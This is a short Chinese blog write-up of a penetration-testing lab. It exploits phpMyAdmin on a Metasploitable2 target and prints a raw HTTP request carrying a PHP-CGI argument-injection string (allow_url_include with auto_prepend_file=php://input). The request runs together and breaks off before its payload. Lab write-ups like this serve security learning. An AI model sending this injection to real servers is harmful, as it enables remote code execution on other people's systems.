前言
做渗透测试的时候偶然发现,phpmyadmin少见的打法,以下就用靶场进行演示了。
0x01漏洞发现
[img=720,337.3109243697479]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202402011616919.png[/img]
环境搭建使用metasploitable2,可在网上搜索下载,搭建很简单这里不多说了。
[img=550,464.75409836065575]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202402011616921.png[/img]
发现phpmyadmin,如果这个时候无法登陆,且也没有前台的漏洞,可以继续在这个phpmyadmin目录下做文章。
发现setup
[img=720,264.96]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202402011616922.png[/img]
0x02漏洞利用
进行漏洞利用
[img=720,493.92]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202402011616923.png[/img]
https://juejin.cn/post/7042901479388086285
[code]POST/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://inputHTTP/1.1Host: 192.168.48.143Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: phpMyAdmin=bdbb427ed9c5e8616fe90261adcfb7229d6ca189;pma_lang=en-utf-8Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 36\ |
